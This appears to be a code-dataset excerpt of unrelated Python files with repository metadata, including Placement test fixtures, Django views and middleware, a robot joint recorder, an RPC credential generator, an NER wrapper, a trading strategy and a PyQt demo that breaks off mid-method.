# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Fixtures for Placement tests."""
from __future__ import absolute_import
from oslo_config import cfg
from oslo_db.sqlalchemy import test_fixtures
from placement.db.sqlalchemy import migration
from placement import db_api as placement_db
from placement import deploy
from placement.objects import resource_class
from placement.objects import trait
from placement import resource_class_cache as rc_cache
class Database(test_fixtures.GeneratesSchema, test_fixtures.AdHocDbFixture):
def __init__(self, conf_fixture, set_config=False):
"""Create a database fixture."""
super(Database, self).__init__()
if set_config:
try:
conf_fixture.register_opt(
cfg.StrOpt('connection'), group='placement_database')
except cfg.DuplicateOptError:
# already registered
pass
conf_fixture.config(connection='sqlite://',
group='placement_database')
self.conf_fixture = conf_fixture
self.get_engine = placement_db.get_placement_engine
placement_db.configure(self.conf_fixture.conf)
def get_enginefacade(self):
return placement_db.placement_context_manager
def generate_schema_create_all(self, engine):
# note: at this point in oslo_db's fixtures, the incoming
# Engine has **not** been associated with the global
# context manager yet.
migration.create_schema(engine)
# so, to work around that placement's setup code really wants to
# use the enginefacade, we will patch the engine into it early.
# oslo_db is going to patch it anyway later. So the bug in oslo.db
# is that code these days really wants the facade to be set up fully
# when it's time to create the database. When oslo_db's fixtures
# were written, enginefacade was not in use yet so it was not
# anticipated that everyone would be doing things this way
_reset_facade = placement_db.placement_context_manager.patch_engine(
engine)
self.addCleanup(_reset_facade)
# Make sure db flags are correct at both the start and finish
# of the test.
self.addCleanup(self.cleanup)
self.cleanup()
# Sync traits and resource classes.
deploy.update_database(self.conf_fixture.conf)
def cleanup(self):
trait._TRAITS_SYNCED = False
resource_class._RESOURCE_CLASSES_SYNCED = False
rc_cache.RC_CACHE = None
|
[
"Wayne [email protected]"
] |
Wayne [email protected]
|
393ccdde7ef08c546deeb32ee7f792b458c689fa
|
a63419b2c457a219c010876ece3980af8cfc3c1b
|
/_DJANGO_/django-player/gameplay/views.py
|
556971862e1019a0cf46647d9fb7fb1688c69685
|
[] |
no_license
|
thomasm1/python_2018
|
ba87560a1e25343c0429fcafe51bb867dc299223
|
6a57c7603055a2511a8734ab34ce21f76e4427ef
|
refs/heads/master
| 2023-05-10T07:20:07.911734 | 2023-05-05T03:58:36 | 2023-05-05T03:58:36 | 147,065,041 | 2 | 5 | null | 2023-03-03T15:15:08 | 2018-09-02T07:41:32 |
Rich Text Format
|
UTF-8
|
Python
| false | false | 1,150 |
py
|
from django.shortcuts import render, get_object_or_404, redirect
from django.contrib.auth.decorators import login_required
from django.core.exceptions import PermissionDenied
from django.views.generic import ListView
from .models import Game
from .forms import MoveForm
@login_required()
def game_detail(request, id):
game = get_object_or_404(Game, pk=id)
context = {'game': game }
if game.is_users_move(request.user):
context['form'] = MoveForm()
return render(request,
"gameplay/game_detail.html",
context
)
@login_required()
def make_move(request, id):
game = get_object_or_404(Game, pk=id)
if not game.is_users_move(request.user):
raise PermissionDenied
move = game.new_move()
form = MoveForm(instance=move, data=request.POST)
if form.is_valid():
move.save()
return redirect("gameplay_detail", id)
else:
return render(request,
"gameplay/game_detail.html",
{'game': game, 'form': form}
)
class AllGamesList(ListView):
model = Game
|
[
"[email protected]"
] | |
e1eca6386c795d0c9133574f9c9d774114791f16
|
781e2692049e87a4256320c76e82a19be257a05d
|
/all_data/exercism_data/python/word-count/5cf7181856df4d0a963c76fedfbdd36a.py
|
f9930a4d6aa5f919c9e249a5f9a7b5e2abcc8d31
|
[] |
no_license
|
itsolutionscorp/AutoStyle-Clustering
|
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
|
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
|
refs/heads/master
| 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null |
UTF-8
|
Python
| false | false | 908 |
py
|
"""Word Counting."""
from collections import Counter
import re
import string
# A regular expression that matches any punctuation character.
PUNCTUATION_REGEX = re.compile("[{}]".format(re.escape(string.punctuation)))
class Phrase(str):
"""A subclass of str that supports word counting."""
def __init__(self, phrase=''):
super(Phrase, self).__init__(phrase)
self._counter = None
def __repr__(self):
return "{!s}({!r})".format(self.__class__.__name__, str(self))
def word_count(self):
"""Return a word frequency dictionary.
A word is delimited by runs of consecutive whitespace or punctuation.
"""
if self._counter is None:
punctuation_erased = re.sub(PUNCTUATION_REGEX, ' ', self)
self._counter = Counter(
word.lower() for word in punctuation_erased.split())
return self._counter
|
[
"[email protected]"
] | |
88441b7e0974e4fc5de5bd965e9a9ad800acd21e
|
c7dfacea4969b4fef264429e7c21d6c2d4c932b4
|
/src/baxter_examples/src/baxter_examples/recorder.py
|
032f365f567755301f351b69f2b1e7a75a832475
|
[
"BSD-2-Clause"
] |
permissive
|
DeepBlue14/arm_wkspc
|
697944c72be9a8efaf97a84b6c26a84ebc8de3a6
|
04009550321868722d207924eed3609be7f54882
|
refs/heads/master
| 2020-03-21T10:10:05.644158 | 2018-06-23T23:16:40 | 2018-06-23T23:16:40 | 138,436,686 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,350 |
py
|
# Copyright (c) 2013-2014, Rethink Robotics
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the Rethink Robotics nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import rospy
import baxter_interface
from baxter_interface import CHECK_VERSION
class JointRecorder(object):
def __init__(self, filename, rate):
"""
Records joint data to a file at a specified rate.
"""
self._filename = filename
self._raw_rate = rate
self._rate = rospy.Rate(rate)
self._start_time = rospy.get_time()
self._done = False
self._limb_left = baxter_interface.Limb("left")
self._limb_right = baxter_interface.Limb("right")
self._gripper_left = baxter_interface.Gripper("left", CHECK_VERSION)
self._gripper_right = baxter_interface.Gripper("right", CHECK_VERSION)
self._io_left_lower = baxter_interface.DigitalIO('left_lower_button')
self._io_left_upper = baxter_interface.DigitalIO('left_upper_button')
self._io_right_lower = baxter_interface.DigitalIO('right_lower_button')
self._io_right_upper = baxter_interface.DigitalIO('right_upper_button')
# Verify Grippers Have No Errors and are Calibrated
if self._gripper_left.error():
self._gripper_left.reset()
if self._gripper_right.error():
self._gripper_right.reset()
if (not self._gripper_left.calibrated() and
self._gripper_left.type() != 'custom'):
self._gripper_left.calibrate()
if (not self._gripper_right.calibrated() and
self._gripper_right.type() != 'custom'):
self._gripper_right.calibrate()
def _time_stamp(self):
return rospy.get_time() - self._start_time
def stop(self):
"""
Stop recording.
"""
self._done = True
def done(self):
"""
Return whether or not recording is done.
"""
if rospy.is_shutdown():
self.stop()
return self._done
def record(self):
"""
Records the current joint positions to a csv file if outputFilename was
provided at construction this function will record the latest set of
joint angles in a csv format.
This function does not test to see if a file exists and will overwrite
existing files.
"""
if self._filename:
joints_left = self._limb_left.joint_names()
joints_right = self._limb_right.joint_names()
with open(self._filename, 'w') as f:
f.write('time,')
f.write(','.join([j for j in joints_left]) + ',')
f.write('left_gripper,')
f.write(','.join([j for j in joints_right]) + ',')
f.write('right_gripper\n')
while not self.done():
# Look for gripper button presses
if self._io_left_lower.state:
self._gripper_left.open()
elif self._io_left_upper.state:
self._gripper_left.close()
if self._io_right_lower.state:
self._gripper_right.open()
elif self._io_right_upper.state:
self._gripper_right.close()
angles_left = [self._limb_left.joint_angle(j)
for j in joints_left]
angles_right = [self._limb_right.joint_angle(j)
for j in joints_right]
f.write("%f," % (self._time_stamp(),))
f.write(','.join([str(x) for x in angles_left]) + ',')
f.write(str(self._gripper_left.position()) + ',')
f.write(','.join([str(x) for x in angles_right]) + ',')
f.write(str(self._gripper_right.position()) + '\n')
self._rate.sleep()
|
[
"[email protected]"
] | |
94b0a380ce4543b547a5176caef0e9ce5901f3ca
|
ad71b2aaab2bf1127f40fef008ac6f6d1334c32c
|
/share/rpcauth/rpcauth.py
|
219286929731362f0553450cf62c1d98e5fd84b4
|
[
"MIT"
] |
permissive
|
minblock/carpaticoin
|
00eb755770f370d54d73ae9b227e4d4bbd60babb
|
f65cf89970b36a073b49435a3833a2a83a7f2145
|
refs/heads/master
| 2021-05-22T01:38:29.187393 | 2020-04-04T04:41:16 | 2020-04-04T04:41:16 | 252,909,819 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,579 |
py
|
#!/usr/bin/env python3
# Copyright (c) 2015-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from argparse import ArgumentParser
from base64 import urlsafe_b64encode
from binascii import hexlify
from getpass import getpass
from os import urandom
import hmac
def generate_salt(size):
"""Create size byte hex salt"""
return hexlify(urandom(size)).decode()
def generate_password():
"""Create 32 byte b64 password"""
return urlsafe_b64encode(urandom(32)).decode('utf-8')
def password_to_hmac(salt, password):
m = hmac.new(bytearray(salt, 'utf-8'), bytearray(password, 'utf-8'), 'SHA256')
return m.hexdigest()
def main():
parser = ArgumentParser(description='Create login credentials for a JSON-RPC user')
parser.add_argument('username', help='the username for authentication')
parser.add_argument('password', help='leave empty to generate a random password or specify "-" to prompt for password', nargs='?')
args = parser.parse_args()
if not args.password:
args.password = generate_password()
elif args.password == '-':
args.password = getpass()
# Create 16 byte hex salt
salt = generate_salt(16)
password_hmac = password_to_hmac(salt, args.password)
print('String to be appended to carpaticoin.conf:')
print('rpcauth={0}:{1}${2}'.format(args.username, salt, password_hmac))
print('Your password:\n{0}'.format(args.password))
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
6ab3e1a39cd93671912027393c5a68e9026211cb
|
7941390ad02fca9f8c66ceaf1d71a9fd0815f50e
|
/simple_NER/annotators/remote/allenai.py
|
b54499e860da539887f6b0098ac177a14e67b49b
|
[
"MIT"
] |
permissive
|
msgpo/simple_NER
|
08cde36758f1d97560c3db9e36918a7e4abe08dd
|
5eaed615d9075d879e4b2af461f2e99acc0f9e68
|
refs/heads/master
| 2022-04-19T13:07:56.507469 | 2020-04-12T18:43:42 | 2020-04-12T18:43:42 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,620 |
py
|
from simple_NER.annotators import NERWrapper
from simple_NER import Entity
import requests
def allen_NER(text, host):
url = host + "named-entity-recognition"
data = {"sentence": text}
return requests.post(url, json=data).json()
class AllenNlpNER(NERWrapper):
def __init__(self, host="http://demo.allennlp.org/predict/"):
super().__init__()
self.host = host
self.add_detector(self.annotate)
def annotate(self, text):
res = allen_NER(text, self.host)
tags = res["tags"]
words = res["words"]
for idx, tag in enumerate(tags):
if tag != 'O':
yield Entity(words[idx], tag, source_text=text)
if __name__ == "__main__":
ner = AllenNlpNER()
ents = [r for r in
ner.extract_entities("Lisbon is the capital of Portugal")]
assert ents[0].as_json() == {'confidence': 1,
'data': {},
'entity_type': 'U-LOC',
'rules': [],
'source_text': 'Lisbon is the capital of Portugal',
'spans': [(0, 6)],
'value': 'Lisbon'}
assert ents[1].as_json() == {'confidence': 1,
'data': {},
'entity_type': 'U-LOC',
'rules': [],
'source_text': 'Lisbon is the capital of Portugal',
'spans': [(25, 33)],
'value': 'Portugal'}
|
[
"[email protected]"
] | |
3dd267f794d2b0b929fd7ea3529b59d9507ba38a
|
a3cc7286d4a319cb76f3a44a593c4a18e5ddc104
|
/lib/surface/app/__init__.py
|
9826abe1d2a81963769b6af01ae5ebf38641f8f6
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
jordanistan/Google-Cloud-SDK
|
f2c6bb7abc2f33b9dfaec5de792aa1be91154099
|
42b9d7914c36a30d1e4b84ae2925df7edeca9962
|
refs/heads/master
| 2023-09-01T01:24:53.495537 | 2023-08-22T01:12:23 | 2023-08-22T01:12:23 | 127,072,491 | 0 | 1 |
NOASSERTION
| 2023-08-22T01:12:24 | 2018-03-28T02:31:19 |
Python
|
UTF-8
|
Python
| false | false | 2,758 |
py
|
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The gcloud app group."""
from googlecloudsdk.calliope import base
DETAILED_HELP = {
'brief': 'Manage your App Engine deployments.',
'DESCRIPTION': """
The gcloud app command group lets you deploy and manage your Google App
Engine apps. These commands replace their equivalents in the appcfg
tool.
App Engine is a platform for building scalable web applications
and mobile backends. App Engine provides you with built-in services and
APIs such as NoSQL datastores, memcache, and a user authentication API,
common to most applications.
More information on App Engine can be found here:
https://cloud.google.com/appengine and detailed documentation can be
found here: https://cloud.google.com/appengine/docs/
""",
'EXAMPLES': """\
To run your app locally in the development application server
to simulate your application running in production App Engine with
sandbox restrictions and services provided by App Engine SDK libraries,
use the `dev_appserver.py` command and your app's `app.yaml`
configuration file to run:
$ dev_appserver.py ~/my_app/app.yaml
For an in-depth look into using the local development server, follow
this guide : https://cloud.google.com/appengine/docs/standard/python/tools/using-local-server.
To deploy the code and configuration of your app to the App Engine
server, run:
$ {command} deploy ~/my_app/app.yaml
To list all versions of all services of your existing deployments, run:
$ {command} versions list
To generate all relevant config files for `~/my_app` (or emit an error
message if the directory contents are not recognized), run:
$ {command} gen-config ~/my_app
"""
}
@base.ReleaseTracks(base.ReleaseTrack.ALPHA,
base.ReleaseTrack.BETA,
base.ReleaseTrack.GA)
class AppengineGA(base.Group):
def Filter(self, context, args):
del context, args
base.DisableUserProjectQuota()
AppengineGA.detailed_help = DETAILED_HELP
|
[
"[email protected]"
] | |
541e28ec93c85cc1adc61eecd87bdde2a641136b
|
c91d029b59f4e6090a523bf571b3094e09852258
|
/src/utils/middlewares.py
|
64ca375d393cdaff4d003588764a00f79181c0a1
|
[
"MIT"
] |
permissive
|
anselmobd/fo2
|
d51b63ebae2541b00af79448ede76b02638c41f0
|
8e7f8f3d9a296c7da39d0faf38a266e9c6c162ab
|
refs/heads/master
| 2023-08-31T19:59:33.964813 | 2023-08-31T19:50:53 | 2023-08-31T19:50:53 | 92,856,677 | 1 | 0 |
MIT
| 2023-04-21T21:50:46 | 2017-05-30T17:04:27 |
Python
|
UTF-8
|
Python
| false | false | 2,927 |
py
|
import re
import threading
from django.conf import settings
from django.http import HttpResponse
from django.shortcuts import redirect
from geral.functions import is_alternativa
from utils.functions import get_client_ip
request_cfg = threading.local()
try:
from django.utils.deprecation import MiddlewareMixin
except ImportError:
MiddlewareMixin = object
from .classes import LoggedInUser, AcessoInterno
class LoggedInUserMiddleware(MiddlewareMixin):
'''
Insert this middleware after
django.contrib.auth.middleware.AuthenticationMiddleware
'''
def process_request(self, request):
'''
Returned None for continue request
'''
logged_in_user = LoggedInUser()
logged_in_user.set_user(request)
return None
class NeedToLoginOrLocalMiddleware(object):
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
user_ip = get_client_ip(request)
authenticated_by_ip = False
for ip in settings.N2LOL_ALLOWED_IP_BLOCKS:
if re.compile(ip).match(user_ip) is not None:
authenticated_by_ip = True
break
acesso_interno = AcessoInterno()
acesso_interno.set_interno(authenticated_by_ip)
acesso_interno.set_ip(user_ip)
if request.user.is_authenticated:
return self.get_response(request)
if authenticated_by_ip:
return self.get_response(request)
user_url = request.META['PATH_INFO']
for url in settings.N2LOL_ALLOWED_URLS:
if re.compile(url).match(user_url) is not None:
return self.get_response(request)
return redirect(settings.N2LOL_REDIRECT)
class AlterRouterMiddleware:
"""
Based on
https://gist.github.com/gijzelaerr/7a3130c494215a0dd9b2/
The Alternative db router middelware.
Before the view sets some context from the URL into thread local storage.
After, deletes it.
In between, any database operation will call the router, which checks for
the thread local storage and returns an appropriate database alias.
Add this to your middleware, for example:
MIDDLEWARE += ['utils.middlewares.AlterRouterMiddleware']
"""
def __init__(self, get_response):
self.get_response = get_response
# One-time configuration and initialization.
def __call__(self, request):
# Code to be executed for each request before
# the view (and later middleware) are called.
request_cfg.alter_db = is_alternativa(request)
request.alter_db = request_cfg.alter_db
response = self.get_response(request)
# Code to be executed for each request/response after
# the view is called.
if hasattr(request_cfg, 'alter_db'):
del request_cfg.alter_db
return response
|
[
"[email protected]"
] | |
f3e46e8de53108b8175863fac2003556b51fdbdc
|
5dc393ffb3d65094d2c4f6bc8b9980e2fc167670
|
/pandas/stats/tests/test_fama_macbeth.py
|
f48dde20f138ac2a2f78bf479e668b579e96ac1f
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
JWCornV/pandas
|
913db2a34cb9f9820f986412e9c3cf868ecef24d
|
6078fba9410918baa486ca008cc9e3ba066c03ec
|
refs/heads/master
| 2020-12-25T10:14:13.384789 | 2012-06-27T17:10:54 | 2012-06-27T17:10:54 | 4,813,052 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,022 |
py
|
from pandas import DataFrame, Panel
from pandas.stats.api import fama_macbeth
from common import assert_almost_equal, BaseTest
import numpy as np
class TestFamaMacBeth(BaseTest):
def testFamaMacBethRolling(self):
# self.checkFamaMacBethExtended('rolling', self.panel_x, self.panel_y,
# nw_lags_beta=2)
# df = DataFrame(np.random.randn(50, 10))
x = dict((k, DataFrame(np.random.randn(50, 10))) for k in 'abcdefg')
x = Panel.from_dict(x)
y = (DataFrame(np.random.randn(50, 10)) +
DataFrame(0.01 * np.random.randn(50, 10)))
self.checkFamaMacBethExtended('rolling', x, y, nw_lags_beta=2)
self.checkFamaMacBethExtended('expanding', x, y, nw_lags_beta=2)
def checkFamaMacBethExtended(self, window_type, x, y, **kwds):
window = 25
result = fama_macbeth(y=y, x=x, window_type=window_type, window=window,
**kwds)
self._check_stuff_works(result)
index = result._index
time = len(index)
for i in xrange(time - window + 1):
if window_type == 'rolling':
start = index[i]
else:
start = index[0]
end = index[i + window - 1]
x2 = {}
for k, v in x.iteritems():
x2[k] = v.truncate(start, end)
y2 = y.truncate(start, end)
reference = fama_macbeth(y=y2, x=x2, **kwds)
assert_almost_equal(reference._stats, result._stats[:, i])
static = fama_macbeth(y=y2, x=x2, **kwds)
self._check_stuff_works(static)
def _check_stuff_works(self, result):
# does it work?
attrs = ['mean_beta', 'std_beta', 't_stat']
for attr in attrs:
getattr(result, attr)
# does it work?
result.summary
if __name__ == '__main__':
import nose
nose.runmodule(argv=[__file__,'-vvs','-x','--pdb', '--pdb-failure'],
exit=False)
|
[
"[email protected]"
] | |
7dbb8959b233092833590760e034f6ebe7360014
|
1065a2782e4947b5bf14ec4536e4ad7addc7aec3
|
/strategy/cryptoalpha/casubc.py
|
f4bb09a5cb12cc696d58f6af909445370b6e56b8
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
Johannesduvenage/siis
|
0bf6875d4a5f3638cadb01ed5541aab29ba1d77a
|
57e537cf9b6a71c8ad0b3bb0759772d126496a17
|
refs/heads/master
| 2020-09-10T21:51:56.814014 | 2019-11-13T23:57:34 | 2019-11-13T23:57:34 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,900 |
py
|
# @date 2018-08-24
# @author Frederic SCHERMA
# @license Copyright (c) 2018 Dream Overflow
# Crypto Alpha strategy, sub-strategy B.
from strategy.indicator import utils
from strategy.strategysignal import StrategySignal
from monitor.streamable import StreamMemberFloatSerie, StreamMemberSerie, StreamMemberFloatBarSerie, StreamMemberOhlcSerie
from .casub import CryptoAlphaStrategySub
import logging
logger = logging.getLogger('siis.strategy.cryptoalpha')
class CryptoAlphaStrategySubC(CryptoAlphaStrategySub):
"""
Crypto Alpha strategy, sub-strategy C.
"""
def __init__(self, strategy_trader, params):
super().__init__(strategy_trader, params)
self.rsi_low = params['constants']['rsi_low']
self.rsi_high = params['constants']['rsi_high']
def process(self, timestamp):
candles = self.get_candles()
if len(candles) < self.depth:
# not enought samples
return
last_timestamp = candles[-1].timestamp
prices = self.price.compute(last_timestamp, candles)
volumes = self.volume.compute(last_timestamp, candles)
signal = self.process1(timestamp, last_timestamp, candles, prices, volumes)
# avoid duplicates signals
if signal and self.need_signal:
# self.last_signal = signal
if (self.last_signal and (signal.signal == self.last_signal.signal) and
(signal.dir == self.last_signal.dir) and
(signal.base_time() == self.last_signal.base_time())): # or (signal.ts - self.last_signal.ts) < (self.tf * 0.5):
# same base time avoid multiple entries on the same candle
signal = None
else:
# retains the last valid signal only if valid
self.last_signal = signal
self.complete(candles)
return signal
def process1(self, timestamp, last_timestamp, candles, prices, volumes):
signal = None
# volume sma, increase signal strength when volume increase over its SMA
# volume_sma = utils.MM_n(self.depth-1, self.volume.volumes)
rsi_30_70 = 0 # 1 <30, -1 >70
rsi_40_60 = 0 # 1 if RSI in 40-60
stochrsi_20_80 = 0 # 1 <20, -1 >80
stochrsi_40_60 = 0 # 1 if stochRSI in 40-60
volume_signal = 0
ema_sma_cross = 0
ema_sma_height = 0
if self.rsi:
self.rsi.compute(last_timestamp, prices)
rsi = self.rsi.last
if self.rsi.last < self.rsi_low:
rsi_30_70 = 1.0
elif self.rsi.last > self.rsi_high:
rsi_30_70 = -1.0
if self.rsi.last > 0.4 and self.rsi.last < 0.6:
rsi_40_60 = 1
if self.stochrsi:
self.stochrsi.compute(last_timestamp, prices)
if self.stochrsi.last_k < 0.2:
stochrsi_20_80 = 1.0
elif self.stochrsi.last_k > 0.8:
stochrsi_20_80 = -1.0
if self.stochrsi.last_k > 0.4 and self.stochrsi.last_k < 0.6:
stochrsi_40_60 = 1
# if self.volume.last > volume_sma[-1]:
# volume_signal = 1
# elif self.volume.last < volume_sma[-1]:
# volume_signal = -1
if self.sma and self.ema:
self.sma.compute(last_timestamp, prices)
self.ema.compute(last_timestamp, prices)
# ema over sma crossing
ema_sma_cross = utils.cross((self.ema.prev, self.sma.prev), (self.ema.last, self.sma.last))
if self.ema.last > self.sma.last:
ema_sma_height = 1
elif self.ema.last < self.sma.last:
ema_sma_height = -1
if self.atr:
if self.last_closed:
self.atr.compute(last_timestamp, self.price.high, self.price.low, self.price.close)
if self.pivotpoint:
if self.pivotpoint.compute_at_close and self.last_closed:
self.pivotpoint.compute(last_timestamp, self.price.open, self.price.high, self.price.low, self.price.close)
return signal
def setup_streamer(self, streamer):
streamer.add_member(StreamMemberSerie('begin'))
streamer.add_member(StreamMemberOhlcSerie('ohlc'))
streamer.add_member(StreamMemberFloatSerie('price', 0))
streamer.add_member(StreamMemberFloatBarSerie('volume', 1))
streamer.add_member(StreamMemberFloatSerie('rsi-low', 2))
streamer.add_member(StreamMemberFloatSerie('rsi-high', 2))
streamer.add_member(StreamMemberFloatSerie('rsi', 2))
streamer.add_member(StreamMemberFloatSerie('stochrsi-low', 3))
streamer.add_member(StreamMemberFloatSerie('stochrsi-high', 3))
streamer.add_member(StreamMemberFloatSerie('stochrsi-k', 3))
streamer.add_member(StreamMemberFloatSerie('stochrsi-d', 3))
streamer.add_member(StreamMemberFloatSerie('sma', 0))
streamer.add_member(StreamMemberFloatSerie('ema', 0))
streamer.add_member(StreamMemberFloatSerie('hma', 0))
streamer.add_member(StreamMemberFloatSerie('vwma', 0))
streamer.add_member(StreamMemberFloatSerie('perf', 3))
streamer.add_member(StreamMemberSerie('end'))
streamer.next_timestamp = self.next_timestamp
def stream(self, streamer):
delta = min(int((self.next_timestamp - streamer.next_timestamp) / self.tf) + 1, len(self.price.prices))
for i in range(-delta, 0, 1):
ts = self.price.timestamp[i]
streamer.member('begin').update(ts)
streamer.member('ohlc').update((self.price.open[i], self.price.high[i], self.price.low[i], self.price.close[i]), ts)
streamer.member('price').update(self.price.prices[i], ts)
streamer.member('volume').update(self.volume.volumes[i], ts)
streamer.member('rsi-low').update(self.rsi_low, ts)
streamer.member('rsi-high').update(self.rsi_high, ts)
streamer.member('rsi').update(self.rsi.rsis[i], ts)
# streamer.member('stochrsi-low').update(20, ts)
# streamer.member('stochrsi-high').update(80, ts)
# streamer.member('stochrsi-k').update(self.stochrsi.stochrsis[i], ts)
# streamer.member('stochrsi-d').update(self.stochrsi.stochrsis[i], ts)
streamer.member('sma').update(self.sma.smas[i], ts)
streamer.member('ema').update(self.ema.emas[i], ts)
# streamer.member('hma').update(self.hma.hmas[i], ts)
# streamer.member('vwma').update(self.vwma.vwmas[i], ts)
streamer.member('perf').update(self.strategy_trader._stats['perf']*100, ts)
streamer.member('end').update(ts)
# push per frame
streamer.push()
streamer.next_timestamp = self.next_timestamp
|
[
"[email protected]"
] | |
ba6aeae64431208cbabea1456729c92c602f9921
|
386d5d4f8f102e701d02b326cd066f520e3dff9f
|
/ProjectApplication/project_core/migrations/0163_add_account_number.py
|
b5f637bb6f9f02103a1375f7fd3e3ed9b338b0fa
|
[
"MIT"
] |
permissive
|
Swiss-Polar-Institute/project-application
|
ae2561c3ae2c1d5412d165d959ce2e5886135e0a
|
7dc4a9f7e0f8d28c89977b85f99bc5e35ea77d43
|
refs/heads/master
| 2023-08-31T04:01:23.492272 | 2023-08-25T14:33:02 | 2023-08-25T14:33:02 | 206,330,401 | 7 | 5 |
MIT
| 2023-09-13T08:03:53 | 2019-09-04T13:49:39 |
Python
|
UTF-8
|
Python
| false | false | 2,043 |
py
|
# Generated by Django 3.2 on 2021-04-23 10:25
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('project_core', '0162_callpartfile_proposal_keywords_null'),
]
operations = [
migrations.AddField(
model_name='financialkey',
name='account_number',
field=models.IntegerField(help_text='Code use by the accounting department', null=True, unique=True),
),
migrations.AlterField(
model_name='call',
name='scientific_clusters_question',
field=models.BooleanField(default=False, help_text='True if the Research Cluster question is enabled'),
),
migrations.AlterField(
model_name='historicalcall',
name='scientific_clusters_question',
field=models.BooleanField(default=False, help_text='True if the Research Cluster question is enabled'),
),
migrations.AlterField(
model_name='proposalscientificcluster',
name='keywords',
field=models.ManyToManyField(help_text='Keywords that describe the research cluster', to='project_core.Keyword'),
),
migrations.AlterField(
model_name='proposalscientificcluster',
name='proposal',
field=models.ForeignKey(help_text='Proposal that this Research Cluster refers to', on_delete=django.db.models.deletion.PROTECT, to='project_core.proposal'),
),
migrations.AlterField(
model_name='proposalscientificcluster',
name='sub_pi',
field=models.ForeignKey(help_text='Main person of this research cluster', on_delete=django.db.models.deletion.PROTECT, to='project_core.personposition'),
),
migrations.AlterField(
model_name='proposalscientificcluster',
name='title',
field=models.CharField(help_text='Title of the research cluster', max_length=500),
),
]
|
[
"[email protected]"
] | |
01f2b39e906fa6896ddad81b11c800af607781d7
|
652121d51e6ff25aa5b1ad6df2be7eb341683c35
|
/examples/mouse_and_key_modifiers.py
|
6d28b7351cebc4f69acb343c35eb8233fa6877a3
|
[] |
no_license
|
jgalaz84/eman2
|
be93624f1c261048170b85416e517e5813992501
|
6d3a1249ed590bbc92e25fb0fc319e3ce17deb65
|
refs/heads/master
| 2020-04-25T18:15:55.870663 | 2015-06-05T20:21:44 | 2015-06-05T20:21:44 | 36,952,784 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,615 |
py
|
from PyQt4 import QtCore, QtGui
class MouseAndKeyModifiers(QtGui.QWidget):
def __init__(self, parent = None):
QtGui.QWidget.__init__(self, parent)
layout = QtGui.QVBoxLayout()
label = QtGui.QLabel("Click here to test mouse buttons: Left, Right, Middle\nand keyboard modifiers: Ctrl, Alt, Shift, and Command (a Mac key)")
self.text_browser = QtGui.QTextBrowser()
layout.addWidget(label)
layout.addWidget(self.text_browser)
self.setLayout(layout)
def mousePressEvent(self, event):
self.text_browser.clear()
self.text_browser.append("Mouse press info...")
if event.buttons()&QtCore.Qt.LeftButton:
self.text_browser.append("Left Button")
if event.buttons()&QtCore.Qt.MidButton:
self.text_browser.append("Middle Button")
if event.buttons()&QtCore.Qt.RightButton:
self.text_browser.append("Right Button")
if event.modifiers()&QtCore.Qt.ShiftModifier:
self.text_browser.append("Shift Modifier")
if event.modifiers()&QtCore.Qt.ControlModifier:
#Apple/Command key on a Mac... NOT CONTROL KEY ON A MAC!
